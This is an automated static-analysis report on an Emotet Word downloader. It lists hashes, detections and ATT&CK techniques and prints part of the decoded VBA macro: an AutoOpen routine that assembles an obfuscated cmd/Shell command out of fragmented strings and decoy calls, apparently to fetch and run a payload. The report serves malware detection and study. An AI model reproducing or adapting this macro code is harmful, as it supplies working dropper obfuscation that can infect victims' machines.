Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 2319a95b214b2e31…

MALICIOUS

Office (OLE)

Size: 93.6 KB
Created: 2018-08-01 22:08:00
Authoring application: Microsoft Office Word
First seen: 2018-08-14
MD5: 66eee2855bb237b7aa86e4094ba23b23
SHA-1: b9ba4bb652a4c7d877358a59a2472c0d3fa8045c
SHA-256: 2319a95b214b2e31da0df544385bc07f647fa2ebcd2c3207eb6d620f683bbeac
Risk Score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6884069-0, indicating downloader functionality. The presence of an AutoOpen VBA macro, detected by the OLE_VBA_AUTOOPEN heuristic, means the macro runs automatically when the document is opened. The macro builds a command line from many concatenated string fragments (with decoy AppActivate calls interleaved to obscure the logic) and passes it to Shell, most likely to download and run a secondary payload, which is typical Emotet behaviour.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6884069-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884069-0
  • VBA macros detected medium (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6007 bytes
SHA-256: 62702e61b033b3d4619ea33b455d847960ee9380d4b3d6a4d7c779a4b5634614
Preview script (first 1,000 lines of the extracted VBA source, shown as recovered):
Attribute VB_Name = "FiEKhpQXZPD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate 114306421
   AppActivate CByte(157416543)
   AppActivate Sztovk
   AppActivate BCwkEl
Shell@ CVar("cm") + IIoQEJAGp + IcIDjuEOHj + jIfvzLIE + VakhwiFJAJ + UqplzjSb + fYuiTzw + MhQDnhSKn, 919844797 - 919844797
   AppActivate Atn(14)
   AppActivate YvViI
End Sub


Attribute VB_Name = "TIwfFIcHvUhE"
Function jIfvzLIE()
On Error Resume Next
AppActivate Sgn(35569 * 52149)
   AppActivate 21
hBhFAlsscjo = "d" + " /V:ON/" + "C" + CStr(Chr(MGDOfzA + fZUDOrFpi + 34 + qJfWmYAwkiciKC + XfoBONGdWOtrK)) + "set 2e=q" + "uAuWjt" + "uwC" + "EDnvjD" + "hEPvi6e'z2"
AppActivate IfJtNY
   AppActivate ChrW(ahFco)
NpTnXujdH = "$m+ GSo:{-" + "a4l)" + "K3" + "}B." + "g8\" + "yfx" + "dU1b" + "N=VF" + "R/k,pYX" + "r@s(c;&" + "&for"
AppActivate 3
   AppActivate 2
kjRqloz = " %N in (63" + ",32,8" + ",22" + ",66," + "68" + ",16,22,3" + "8,38,29,26" + ",20," + "20,1"
AppActivate 6882
   AppActivate CDbl(HnqIM * aEkaTT - adsBvF + CCnJzE)
XFOLYcw = "4,56,1" + "2,2" + "2,8,3" + "5,32,54,14" + ",2" + "2,70,6,29" + "," + "55,22," + "6,4" + "4" + ",4"
AppActivate Cos(jPwjP - NlrOo - bSTjK + zjKIi)
   AppActivate 191631543
   AppActivate NGvjaV
zUzTlCvKQDt = "," + "22,54,9," + "38," + "20,22,1" + "2,6,71,26,"
AppActivate Rnd(NBElO)
   AppActivate Round(90703 / NYFzH)
   AppActivate Sgn(1973 + piWmn)
BLbluzlIq = "20,68" + ",15,56," + "23,16,6,6" + ",63," + "33,60,60"
AppActivate 626
   AppActivate Rnd(5)
   AppActivate Sqr(VVIpY)
ZLVEfE = ",61,38,2" + "0,12,45" + ",22,66,20," + "4" + "5,20," + "4" + "4,70,32," + "27," + "6" + "0" + ",68,32" + ",53,53,57," + "67,"
AppActivate CByte(iCnSM)
   AppActivate Round(1)
   AppActivate Round(ANmOjU)
PjwFito = "16,6" + ",6,63,3" + "3,60,60,61" + ",12" + "," + "32,8,"
AppActivate Oct(24)
   AppActivate Sgn(5)
   AppActivate Chr(dKjSZJ)
SZiJMBMI = "20," + "12,45,36" + ",4" + "9,66,2" + "0,70," + "36," + "44" + ",3"
AppActivate Atn(8881 - 6112 * 70085 + ZONXpC)
   AppActivate Log(dAnanV)
   AppActivate CLng(LqHNlS + vzamX * 33584 + rIMiCJ)
iBBXdjoMYo = "2,66,4" + "5,60," + "40,40,2" + "2," + "24" + ",41,65,19," + "67,16," + "6,6,63,3"
AppActivate 8261
   AppActivate CInt(CUuFss + QwAbcW)
mccjMFw = "3,60,60" + ",22,5" + "0,63,22,6" + "6,20,27" + ",22,12,6" + ",36" + ",38," + "44," + "7" + "0,32,44" + ",2" + "4,36,6" + "0,43,2,38"
AppActivate Log(6)
   AppActivate KfiVs
zovCJCSw = ",70,67,16," + "6" + ",6" + ",63,33," + "60,60" + ",3" + "8" + ",36,49," + "3" + "6,54,6" + "6,20,0,7"
jIfvzLIE = hBhFAlsscjo + NpTnXujdH + kjRqloz + XFOLYcw + zUzTlCvKQDt + BLbluzlIq + ZLVEfE + PjwFito + SZiJMBMI + iBBXdjoMYo + mccjMFw + zovCJCSw
   AppActivate Oct(JGiivu)
   AppActivate Tan(8003)
   AppActivate Round(ZdlXjD)
End Function
Function VakhwiFJAJ()
On Error Resume Next
AppActivate CBool(rUhTJ * sbASzf)
   AppActivate CLng(IRDtA)
LXjYjwOM = ",22," + "51,22,68," + "20" + ",45,12,44" + ",70," + "32,27,60," + "59,6" + "4,20,59,15" + ",67,16,6" + ",6,63," + "3"
AppActivate CByte(kVsMo / cUHoiQ / iMNGh * wijikl)
   AppActivate Sqr(60665 - hDArck)
   AppActivate 9
BihhfJFs = "3,60," + "60,63" + ",38," + "36,6,45" + ","
AppActivate Log(PMmUKQ)
   AppActivate 4
   AppActivate ChrW(QYPjwI)
BujzGvwdtp = "22,6" + "8,51,22,6" + ",32,68" + ",68,36,4" + "4," + "70,32,2"
AppActivate 7
   AppActivate WDrmk
fZilzYIXL = "7,60" + ",37,30," + "40,45" + ",65,6" + "5,25,4" + "3,23,44," + "31,63,38," + "20,6,6" + "9," + "23,67,2"
AppActivate 9
   AppActivate CBool(611)
XcVzG = "3,39,71,26" + "," + "64,1" + "7,57,29,5" + "6"
AppActivate Rnd(47773 / TIFlNq)
   AppActivate Atn(aXTfD)
UVorjpTQaf = ",29,23" + ",53,21,46" + ",2" + "3,7" + "1," + "26,31,52," + "68,5" + "6,26,22,12" + ",19,33" + ",6,22,27" + ",63" + ",28,23,4"
AppActivate CDate(SBvWu)
   A
... (truncated)